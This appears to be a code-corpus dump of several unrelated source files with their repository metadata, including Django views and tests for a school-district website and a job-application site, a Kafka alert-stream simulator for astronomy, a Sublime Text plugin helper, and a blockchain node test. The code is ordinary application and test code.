endorse_block(self.nodes[0], apm, last_block - 5)
self._assert_nodes_peer_info()
containing_block_hash = self.nodes[0].generate(nblocks=1)[0]
containing_block = self.nodes[0].getblock(containing_block_hash)
assert len(containing_block.containingVTBs) == vtbs_amount
assert len(containing_block.containingVBKs) == vbk_blocks_amount + vtbs_amount + 1
assert last_block >= 6
self.log.info("endorse {} alt block".format(last_block - 6))
endorse_block(self.nodes[0], apm, last_block - 6)
self._assert_nodes_peer_info()
self.nodes[0].generate(nblocks=1)
time.sleep(5)
self.log.info("sync all nodes")
sync_all(self.nodes)
self._assert_nodes_peer_info()
def _assert_nodes_peer_info(self):
self._assert_node_peer_info(self.nodes[0])
self._assert_node_peer_info(self.nodes[1])
def _assert_node_peer_info(self, node):
peer_info = node.getpeerinfo()
assert len(peer_info) == 1
assert peer_info[0].banscore == 0
| 2.265625 | 2 |
blog/articles/urls.py | dotHashemi/django-practice | 1 | 12769983 | <filename>blog/articles/urls.py<gh_stars>1-10
from django.urls import path
from articles import views
urlpatterns = [
path('', views.index, name='articles.index'),
path('<int:id>/', views.show, name='articles.show'),
]
| 1.875 | 2 |
hyrodactil/tests/public/test_views.py | hizardapp/Hizard | 1 | 12769984 | <gh_stars>1-10
import os
from django.core import mail
from django.core.urlresolvers import reverse
from django_webtest import WebTest
from ..factories._accounts import UserFactory
from ..factories._companysettings import (
InterviewStageFactory
)
from ..factories._openings import OpeningWithQuestionFactory
from applications.models import Application, ApplicationAnswer
from public.models import Interest
from tests.utils import subdomain_get, career_site_get, career_site_post
from customisable_emails.models import EmailTemplate
class PublicViewsTests(WebTest):
def test_anonymous_can_access_landing_page(self):
url = reverse('public:landing-page')
response = subdomain_get(self.app, url)
self.assertEqual(response.status_code, 200)
def test_anonymous_can_add_email(self):
url = reverse('public:landing-page')
form = subdomain_get(self.app, url).form
form['email'] = '<EMAIL>'
form.submit()
self.assertEqual(Interest.objects.count(), 1)
def test_invalid_interest_email_error(self):
url = reverse('public:landing-page')
form = subdomain_get(self.app, url).form
form['email'] = 'astonmartin.com'
response = form.submit().follow()
self.assertEqual(Interest.objects.count(), 0)
self.assertContains(response, 'invalid')
class ApplicationViewsTests(WebTest):
def setUp(self):
self.user = UserFactory()
self.opening = OpeningWithQuestionFactory(company=self.user.company)
def test_get_list_openings(self):
url = reverse('public:opening-list')
self.user.company.subdomain = self.user.company.subdomain.title()
self.user.company.save()
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertEqual(page.status_code, 200)
self.assertContains(page, self.opening.title)
def test_get_list_openings_inexisting_subdomain(self):
url = reverse('public:opening-list')
self.app.get(url, headers=dict(Host="tralala.h.com"), status=404)
def test_get_list_openings_with_an_unpublished_one(self):
OpeningWithQuestionFactory(
title="Dreamer",
company=self.user.company,
published_date=None
)
url = reverse('public:opening-list')
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertNotContains(page, 'Dreamer')
def test_get_application_form(self):
url = reverse('public:apply', args=(self.opening.id,))
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertEqual(page.status_code, 200)
self.assertContains(page, self.opening.company.name)
self.assertContains(page, self.opening.description)
self.assertContains(page, self.opening.title)
self.assertContains(
page, self.opening.questions.all()[0].title
)
def test_valid_post_application_form(self):
stage = InterviewStageFactory(tag='RECEIVED', company=self.user.company)
url = reverse('public:apply', args=(self.opening.id,))
EmailTemplate.objects.create(
company=self.user.company,
code="application_received",
subject="Thank your for applying for {{ opening }}",
body="Dear {{applicant_first_name}}, Best regards",
)
form = career_site_get(self.app, url, self.user.company.subdomain).form
form['first_name'] = 'Bilbon'
form['last_name'] = 'Sacquet'
form['email'] = '<EMAIL>'
# name of file, content of file
form['resume'] = 'bilbon_cv.pdf', "My resume"
form['question-1'] = 'Lalala'
response = form.submit().follow()
self.assertEqual(
response.request.path,
reverse('public:confirmation', args=(self.opening.id,))
)
self.assertEqual(Application.objects.count(), 1)
application = Application.objects.get(id=1)
applicant = application.applicant
self.assertEqual(applicant.first_name, 'Bilbon')
self.assertEqual(applicant.resume.url,
'/media/resumes/%d/bilbon_cv.pdf' % self.opening.company.id)
self.assertEqual(application.current_stage, stage)
self.assertEqual(len(mail.outbox), 1)
email, = mail.outbox
self.assertTrue("Bilbon" in email.body)
self.assertTrue(self.opening.title in email.subject)
# 2 required, 1 not required, we still record the 3 though
self.assertEqual(ApplicationAnswer.objects.count(), 1)
# And the resume we just created
os.unlink(applicant.resume.path)
def test_invalid_post_application_form(self):
url = reverse('public:apply', args=(self.opening.id,))
form = career_site_get(self.app, url, self.user.company.subdomain).form
form['first_name'] = 'Software Developer'
form['last_name'] = '<NAME>.'
form['question-1'] = ''
response = form.submit()
self.assertEqual(response.status_code, 200)
self.assertEqual(Application.objects.count(), 0)
def test_get_apply_form_unpublished(self):
opening = OpeningWithQuestionFactory(company=self.user.company, published_date=None)
url = reverse('public:apply', args=(opening.id,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
def test_get_inexisting_opening_form(self):
url = reverse('public:apply', args=(42,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
def test_post_inexisting_opening_form(self):
url = reverse('public:apply', args=(42,))
career_site_post(self.app, url, self.user.company.subdomain, status=404)
def test_post_unpublished_opening_form(self):
opening = OpeningWithQuestionFactory(company=self.user.company, published_date=None)
url = reverse('public:apply', args=(opening.id,))
career_site_post(self.app, url, self.user.company.subdomain, status=404)
def test_get_application_confirmation_opening_not_exist(self):
url = reverse('public:confirmation', args=(42,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
class EmbedViewsTest(WebTest):
def setUp(self):
self.user = UserFactory()
self.opening = OpeningWithQuestionFactory(company=self.user.company)
def test_basic_opening_embedding(self):
url = reverse('public:embed')
response = career_site_get(self.app, url, self.user.company.subdomain.lower())
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.opening.title)
| 2.25 | 2 |
src/printBoard.py | Harry-Hopkinson/dots-and-boxes | 1 | 12769985 | <filename>src/printBoard.py<gh_stars>1-10
from checkDraw import *
from checkWin import *
from constants import *
from endGame import *
from play import *
from playAgain import *
from playerOneMove import *
from playerTwoMove import *
from board import *
def printBoard(board):
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == 0:
print(".", end="")
elif board[i][j] == 1:
print("x", end="")
elif board[i][j] == -1:
print("o", end="")
print()
print(hash)
| 3.34375 | 3 |
supermarketToexpress/views.py | NotEnterprising/DATABASE_supermarket | 0 | 12769986 | <filename>supermarketToexpress/views.py
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.shortcuts import render, HttpResponseRedirect, redirect
from supermarket.models import Supermarket
from .models import SupermarketToExpress
from .forms import CreateSupermarketToExpress, EditSupermarketToExpress
@login_required
def create_result(request):
supermarkets = Supermarket.objects.all()
if request.method == 'POST':
# after visiting the second page
if 'finish' in request.POST:
form = CreateSupermarketToExpress(request.POST)
if form.is_valid():
express = form.cleaned_data['express']
supermarkets = request.POST['supermarkets']
results = []
for supermarket in supermarkets.split(','):
sup = Supermarket.objects.get(pk=supermarket)
check = SupermarketToExpress.objects.filter(supermarket=sup, express=express).first()
if not check:
results.append(
SupermarketToExpress(
express=express,
supermarket=sup
)
)
SupermarketToExpress.objects.bulk_create(results)
return redirect('view-SupermarketToExpress')
# after choosing students
id_list = request.POST.getlist('supermarkets')
if id_list:
form = CreateSupermarketToExpress()
supermarket_list = ','.join(id_list)
return render(request, 'create_supermarketToexpress_page2.html',
{"supermarkets": supermarket_list, "form": form, "count": len(id_list)})
else:
messages.warning(request, "你没有选择任何超市")
return render(request, 'create_supermarketToexpress.html', {"supermarkets": supermarkets})
@login_required
def edit_results(request):
if request.method == 'POST':
form = EditSupermarketToExpress(request.POST)
if form.is_valid():
form.save()
messages.success(request, '删除成功')
return redirect('edit-SupermarketToExpress')
else:
results = SupermarketToExpress.objects.all()
form = EditSupermarketToExpress(queryset=results)
return render(request, 'edit_supermarketToexpress.html', {"formset": form})
@login_required
def all_results_view(request):
results = SupermarketToExpress.objects.all()
bulk = {}
for result in results:
expresss = []
for express in results:
if express.supermarket == result.supermarket:
expresss.append(express.express)
bulk[result.supermarket.id] = {
"supermarket": result.supermarket,
"expresses": expresss,
}
context = {
"results": bulk
}
return render(request, 'all_supermarketToexpress.html', context)
| 2.296875 | 2 |
mechlib/filesys/_rct.py | sjklipp/mechdriver | 0 | 12769987 | """ rct cnf fs because don't knwo where else to put it and avoid
circular imports
"""
from mechanalyzer.inf import thy as tinfo
from mechlib.filesys._build import build_fs
from mechlib.filesys.mincnf import min_energy_conformer_locators
def rcts_cnf_fs(rct_infos, thy_dct, es_keyword_dct, run_prefix, save_prefix):
""" set reactant filesystem stuff
"""
ini_method_dct = thy_dct.get(es_keyword_dct['inplvl'])
ini_thy_info = tinfo.from_dct(ini_method_dct)
rct_cnf_fs = ()
for rct_info in rct_infos:
mod_ini_thy_info = tinfo.modify_orb_label(
ini_thy_info, rct_info)
# Build filesys for ini thy info
ini_cnf_run_fs, ini_cnf_save_fs = build_fs(
run_prefix, save_prefix, 'CONFORMER',
spc_locs=rct_info,
thy_locs=mod_ini_thy_info[1:])
ini_loc_info = min_energy_conformer_locators(
ini_cnf_save_fs, mod_ini_thy_info)
ini_min_cnf_locs, ini_min_cnf_path = ini_loc_info
# Create run fs if that directory has been deleted to run the jobs
ini_cnf_run_fs[-1].create(ini_min_cnf_locs)
rct_cnf_fs += ((ini_cnf_run_fs, ini_cnf_save_fs,
ini_min_cnf_locs, ini_min_cnf_path),)
return rct_cnf_fs
__all__ = [
'build_fs',
'prefix_fs',
'root_locs',
'mincnf',
'models',
'read',
'save'
]
| 1.992188 | 2 |
floo/editor.py | barrasch/floobits-sublime | 124 | 12769988 | import sys
import os
try:
import sublime
except Exception:
pass
NEW_ACCOUNT_TXT = '''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage.
You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''
LINKED_ACCOUNT_TXT = '''Welcome {username}!\n\nYou are all set to collaborate.
You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Sublime Text %s' % py_version
def codename():
return 'sublime'
def ok_cancel_dialog(dialog):
return sublime.ok_cancel_dialog(dialog)
def error_message(msg):
sublime.error_message(msg)
def status_message(msg):
sublime.status_message(msg)
def platform():
return sublime.platform()
def set_timeout(f, timeout):
sublime.set_timeout(f, timeout)
def call_timeouts():
return
def message_dialog(msg):
sublime.message_dialog(msg)
def open_file(file):
win = sublime.active_window()
if win:
win.open_file(file)
def get_line_endings(path=None):
ending = sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')
if ending == 'system':
return os.linesep
if ending == 'windows':
return '\r\n'
return '\n'
def select_auth(*args):
window, auths, cb = args
if not auths:
return cb(None)
auths = dict(auths)
for k, v in auths.items():
v['host'] = k
if len(auths) == 1:
return cb(list(auths.values())[0])
opts = [[h, 'Connect as %s' % a.get('username')] for h, a in auths.items()]
opts.append(['Cancel', ''])
def on_account(index):
if index < 0 or index >= len(auths):
# len(hosts) is cancel, appended to opts at end below
return cb(None)
host = opts[index][0]
return cb(auths[host])
flags = 0
if hasattr(sublime, 'KEEP_OPEN_ON_FOCUS_LOST'):
flags |= sublime.KEEP_OPEN_ON_FOCUS_LOST
return window.show_quick_panel(opts, on_account, flags)
| 2.359375 | 2 |
supervisord_dependent_startup/tests/__init__.py | bendikro/ordered-startup-supervisord | 54 | 12769989 | from __future__ import print_function
import os
from supervisord_dependent_startup.supervisord_dependent_startup import (DependentStartup,
DependentStartupError,
get_all_configs,
process_states, Service,
ServiceOptions,
ServicesHandler, xmlrpclib)
from .log_utils import setup_tests_logging
__all__ = ['DependentStartup', 'ServiceOptions', 'DependentStartupError', 'Service',
'ServicesHandler', 'get_all_configs', 'process_states', 'xmlrpclib']
setup_tests_logging()
valid_booleans = {'true': True, 'True': True, 'TRUE': True, 't': True, '1': True}
cleanup_tmp_dir = os.environ.get('CLEANUP_TESTS', "True") in valid_booleans
# Name of directory to store supervisor config files. If unset, a random value is used
test_tmp_dir = os.environ.get('TEST_TMP_DIR', None)
| 2.046875 | 2 |
Python/Loops/loops.py | boneskewer69/ifis | 0 | 12769990 | <gh_stars>0
x = 1
while True:
x = input("Number:\n> ")
if int(x) == 0:
break
| 3.15625 | 3 |
bin/simulate_stream.py | astrolabsoftware/fink-alert-simulator | 0 | 12769991 | #!/usr/bin/env python
# Copyright 2019-2022 AstroLab Software
# Author: <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simulate batches of alerts coming from ZTF or ELaSTICC.
"""
import argparse
import os
import sys
import glob
import time
import asyncio
import gzip
import numpy as np
from fink_alert_simulator import alertProducer
from fink_alert_simulator import avroUtils
from fink_alert_simulator.parser import getargs
def main():
parser = argparse.ArgumentParser(description=__doc__)
args = getargs(parser)
# Configure producer connection to Kafka broker
conf = {'bootstrap.servers': args.servers}
streamproducer = alertProducer.AlertProducer(
args.topic, schema_files=None, **conf)
# Scan for avro files
root = args.datasimpath
# Grab data stored on disk
files = glob.glob(os.path.join(root, "*.avro*"))
# Number of observations, and total number of alerts to send.
nobs = args.nobservations
poolsize = args.nalerts_per_obs * nobs
if nobs == -1:
# Take all alerts available
nobs = int(len(files) / float(args.nalerts_per_obs)) + 1
poolsize = args.nalerts_per_obs * nobs
msg = """
All {} alerts to be sent (nobservations=-1), corresponding
to {} observations ({} alerts each).
""".format(len(files), nobs, args.nalerts_per_obs)
print(msg)
elif len(files) < poolsize:
# Send only available alerts
nobs = int(len(files) / float(args.nalerts_per_obs)) + 1
msg = """
You ask for more data than you have!
Number of alerts on disk ({}): {}
Number of alerts required (nalerts_per_obs * nobservations): {}
Hence, we reduced the number of observations to {}.
""".format(root, len(files), poolsize, nobs)
print(msg)
print('Total alert available ({}): {}'.format(root, len(files)))
print('Total alert to be sent: {}'.format(poolsize))
# Break the alert list into observations
files = np.array_split(files[:poolsize], nobs)[:nobs]
# Starting time
t0 = time.time()
print("t0: {}".format(t0))
def send_visit(list_of_files):
""" Send all alerts of an observation for publication in Kafka
Parameters
----------
list_of_files: list of str
List with filenames containing the alert (avro file). Alerts
can be gzipped, but the extension should be
explicit (`avro` or `avro.gz`).
"""
print('Observation start: t0 + : {:.2f} seconds'.format(
time.time() - t0))
# Load alert contents
startstop = []
for index, fn in enumerate(list_of_files):
if fn.endswith('avro'):
copen = lambda x: open(x, mode='rb')
elif fn.endswith('avro.gz'):
copen = lambda x: gzip.open(x, mode='rb')
else:
msg = """
Alert filename should end with `avro` or `avro.gz`.
Currently trying to read: {}
""".format(fn)
raise NotImplementedError(msg)
with copen(fn) as file_data:
# Read the data
data = avroUtils.readschemadata(file_data)
# Read the Schema
schema = data.schema
# assuming one record per data
record = next(data)
if index == 0 or index == len(list_of_files) - 1:
if args.to_display != 'None':
fields = args.to_display.split(',')
to_display = record[fields[0]]
for field_ in fields[1:]:
to_display = to_display[field_]
startstop.append(to_display)
streamproducer.send(record, alert_schema=schema, encode=True)
if args.to_display != 'None':
print('{} alerts sent ({} to {})'.format(len(
list_of_files),
startstop[0],
startstop[1]))
# Trigger the producer
streamproducer.flush()
loop = asyncio.get_event_loop()
asyncio.ensure_future(
alertProducer.schedule_delays(
loop,
send_visit,
files,
interval=args.tinterval_kafka))
loop.run_forever()
loop.close()
if __name__ == "__main__":
main()
| 2.109375 | 2 |
array_processing/__init__.py | uafgeotools/array_processing | 9 | 12769992 | <gh_stars>1-10
from . import algorithms
from . import tools
| 1.03125 | 1 |
apps/common/functions.py | iamjdcollins/districtwebsite | 0 | 12769993 | <filename>apps/common/functions.py
import os
import shutil
import re
import uuid
from urllib.parse import urlparse, urlsplit, urlunsplit
from django.conf import settings
from django.apps import apps
from django.db.models import Q
from django.core.mail import EmailMessage
from django.contrib.auth import get_permission_codename
from guardian.shortcuts import get_perms
from django.core.exceptions import FieldDoesNotExist
from django.utils import timezone
from datetime import timedelta
from ckeditor.fields import RichTextField
# Required for response change
import base64
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.http import HttpResponseRedirect
from django.utils.http import urlquote
from django.contrib import messages
from django.contrib.sites.models import Site
from multisite.models import Alias
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from pilkit.utils import suggest_extension
from threading import Thread
from collections import OrderedDict
def multisite_fallback_view(request):
pass
def contactmessage_confirm(self):
email = EmailMessage(
'THANK YOU: ' + self.message_subject,
('<p>We have received your message. '
'We will get back to you shortly.</p>'
'<br><p><strong>Original Message</strong>'
'</p><br><p>' + self.your_message + '</p>'),
'Salt Lake City School District <<EMAIL>>',
[self.your_email],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def contactmessage_message(self):
email = EmailMessage(
'WEBSITE CONTACT: ' + self.message_subject,
('<p><strong>From:</strong> {0}: {1}</p>'
'<p><strong>To:</strong> {2}</p><p><strong>Page:</strong> '
'<a href="https://{5}{3}">https://{5}'
'{3}</a></p><p><strong>Message:</strong><br>{4}</p>').format(
self.your_name,
self.your_email,
self.primary_contact.email,
self.parent.url,
self.your_message,
get_domain(self.site),
),
'"{0}" <{1}>'.format(self.your_name, self.your_email),
[self.primary_contact.email],
bcc=['<EMAIL>'],
reply_to=[self.your_email],
headers={
'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8],
'Sender': ('Salt Lake City School District'
'<<EMAIL>>'),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def customerror_emailadmins(subject, message):
email = EmailMessage(
subject,
message,
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={
'Message-ID': str(uuid.uuid4()),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def urlchanged_email(self, oldurl):
email = EmailMessage(
'Website URL Changed App {0} Type {1}'.format(
self.node_type, self.content_type),
('<p><strong>Previous URL:</strong> ' + oldurl + '</p>'
'<p><strong>New URL:</strong> ' + self.url + '</p>'),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def filepath_email(self, oldpath, newpath):
email = EmailMessage(
'File Path Changed: App {0} Type {1}'.format(
self.parent.node_type, self.parent.content_type),
('<p><strong>Previous Path:</strong> ' + oldpath + '</p>'
'<p><strong>New Path:</strong> ' + newpath + '</p>'),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def failed_saml_login_email(username):
email = EmailMessage(
'Failed SAML Login',
'An attempt to login via SAML has failed for username: {0}'.format(
username
),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(uuid.uuid4())},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def findfileext_media(media):
media = media.split('/')[-1:]
return os.path.splitext(media[0])
def urlclean_fileext(fileext):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^.a-z0-9\s-])', '', fileext.lower())))
def urlclean_objname(objname):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^a-z0-9\s-])', '', objname.lower())))
def urlclean_remdoubleslashes(objname):
return re.sub('/+', '/', objname.lower())
def silentdelete_media(media):
try:
if os.path.isfile(media):
os.remove(media)
elif os.path.isdir(media):
shutil.rmtree(media, ignore_errors=True)
except OSError:
pass
def silentmove_media(oldpath, newpath):
try:
if not os.path.isdir(oldpath) & os.path.isdir(newpath):
f = open('/tmp/movingfile.txt', 'a')
f.write('Moving: ' + oldpath + ' To: ' + newpath + '\n')
f.close()
shutil.move(oldpath, newpath)
else:
try:
f = open('/tmp/movingfile.txt', 'a')
f.write('Removing: ' + oldpath + '\n')
f.close()
os.rmdir(oldpath)
except OSError:
pass
except OSError:
pass
def has_add_permission(self, request, obj=None):
# Prevent showing the Save and Add Another Option
if request.path.split('/')[-2:][0] == 'change':
return False
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'add', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
elif obj:
if get_permission_codename(
'add', self.model._meta) in get_perms(request.user, obj):
return True
return False
def has_change_permission(self, request, obj=None):
if self is not None:
# Check for regular global model permission
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'change', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
if obj:
if request.user.is_authenticated:
if request.user.pk in can_edit_page(obj):
return True
# if request.user.groups.filter(name='Website Managers'):
# return True
# elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
# return True
# if obj.has_permissions:
# # Check for object level permission through Guardian
# if get_permission_codename(
# 'change', obj._meta) in get_perms(request.user, obj):
# return True
# else:
# node = objectfindnode(obj)
# permission_point = nodefindobject(
# node.get_ancestors().filter(has_permissions=True).last())
# if get_permission_codename(
# 'change', permission_point._meta) in get_perms(
# request.user, permission_point):
# return True
return False
def has_delete_permission(self, request, obj=None):
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'trash', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif obj:
if obj.has_permissions:
# Check for object level permission through Guardian
if get_permission_codename(
'trash', self.model._meta) in get_perms(request.user, obj):
return True
else:
node = objectfindnode(obj)
permission_point = nodefindobject(
node.get_ancestors().filter(has_permissions=True).last())
if get_permission_codename(
'trash', permission_point._meta) in get_perms(
request.user, permission_point):
return True
return False
def has_add_permission_inline(self, request, obj=None):
# Allow if object is new (should always be new)
if obj is None:
return True
return False
def has_change_permission_inline(self, request, obj=None):
return True
def has_delete_permission_inline(self, request, obj=None):
return True
def modeltrash(self, *args, **kwargs):
if self.deleted == 0:
self.deleted = True
self.save()
else:
super(self._meta.model, self).delete()
def movechildren(self):
children = self.get_children()
for child in children:
if child.content_type == 'Board':
child.board.save()
elif child.content_type == 'BoardSubPage':
child.boardsubpage.save()
# Upload Image Functions
def image_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.image_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
# Upload File Functions
def file_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.file_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
def precinct_map_upload_to(instance, filename):
pass
# Save Content Functions
def modelsave(self, *args, **kwargs):
if not self.site:
if self.parent:
self.site = self.parent.site
else:
raise Exception('site not set for object. cannot be saved.')
Node = apps.get_model('objects', 'node')
User = apps.get_model('objects', 'user')
Alias = apps.get_model('multisite', 'alias')
# Is this a new instance?
is_new = self._state.adding
# Set deleted prefix
is_deleted = '_' if self.deleted is True else ''
# Set UUID if None
self.uuid = self.uuid if self.uuid else uuid.uuid4()
# Set original date on event
try:
if self._meta.get_field('originaldate'):
if (not self.originaldate) and self.startdate:
self.originaldate = self.startdate
self.originalinstance = len(self._meta.model.objects.filter(
originaldate=self.originaldate)) + 1
except FieldDoesNotExist:
pass
# Create Parent
if self.PARENT_TYPE:
creator = User.objects.get(username='<EMAIL>')
self.parent = self.create_parent(creator=creator)
# Force Parent
if self.PARENT_URL:
try:
self.parent = Node.objects.exclude(
uuid=self.uuid).get(url=self.PARENT_URL, site=self.site)
except Node.DoesNotExist:
pass
# Related Node matches Parent
try:
if self._meta.get_field('related_node'):
self.related_node = self.parent
except FieldDoesNotExist:
pass
# Force Title
self.title = self.force_title()
# Set Slug
self.slug = urlclean_objname(self.title)
if not self.sluginstance:
self.sluginstance = 0
# Set URL
urlchanged = False
parent_url = self.parent.url if self.parent else self.PARENT_URL
oldurl = self.url
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
while Node.objects.filter(site=self.site).filter(url=self.url).exclude(
pk=self.pk).count() >= 1:
self.sluginstance += 1
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
if not is_new and (oldurl != self.url):
urlchanged = True
Thread(target=urlchanged_email, args=(self, oldurl)).start()
# # Set new name for file fields
# currentname = None
# newname = None
# # Image file field
# try:
# if self.image_file:
# currentname = findfileext_media(self.image_file.name)
# newname = image_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.image_file.name = newname
# except AttributeError:
# pass
# # File file field
# try:
# if self.file_file:
# currentname = findfileext_media(self.file_file.name)
# newname = file_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.file_file.name = newname
# except AttributeError:
# pass
# Set the node_title for the node
self.node_title = self.title
# Set the node type
self.node_type = self._meta.app_label
# Set the content type
self.content_type = self._meta.model_name
# if not self.menu_title:
# self.menu_title = self.title
# Set school year for events
try:
if self._meta.get_field('schoolyear'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['long']
)
except FieldDoesNotExist:
pass
# Set yearend for events
if self.node_type == 'events':
try:
if self._meta.get_field('yearend'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['short']
)
except FieldDoesNotExist:
pass
# Does this item have permissions?
if self.HAS_PERMISSIONS:
self.has_permissions = True
else:
self.has_permissions = False
# Fix richtext anchor tags
for field in self._meta.fields:
if field.__class__ == RichTextField:
field_value = getattr(self, field.name)
if field_value:
links = re.findall(r'<a .*?</a>', field_value)
for link in links:
try:
url = re.search(
r'(?:href)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(link)
rr = link
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
images = re.findall(r'<img .*? />', field_value)
for image in images:
try:
url = re.search(
r'(?:src)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(image)
rr = image
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
setattr(self, field.name, field_value)
# Set Link URL to absolute URL
try:
if self._meta.get_field('link_url'):
self.link_url = link_url_absolute(self)
except FieldDoesNotExist:
pass
# Save the item
super(self._meta.model, self).save(*args, **kwargs)
# Set the section page count
if self.pagelayout.namespace == 'site-section.html':
node = objectfindnode(self)
node.section_page_count = len(
self
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
pagelayout__namespace='site-section.html',
)
)
node.save()
else:
node = objectfindnode(self)
node.section_page_count = 1
if self.parent:
if self.parent.pagelayout.namespace == 'site-section.html':
self.parent.section_page_count = len(
self.parent
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
Q(pagelayout__namespace='site-section.html') |
Q(pk=self.pk),
)
)
if self.published and not self.deleted:
self.parent.section_page_count += 1
self.parent.save()
node.save()
# # Move Directories for children then parent.
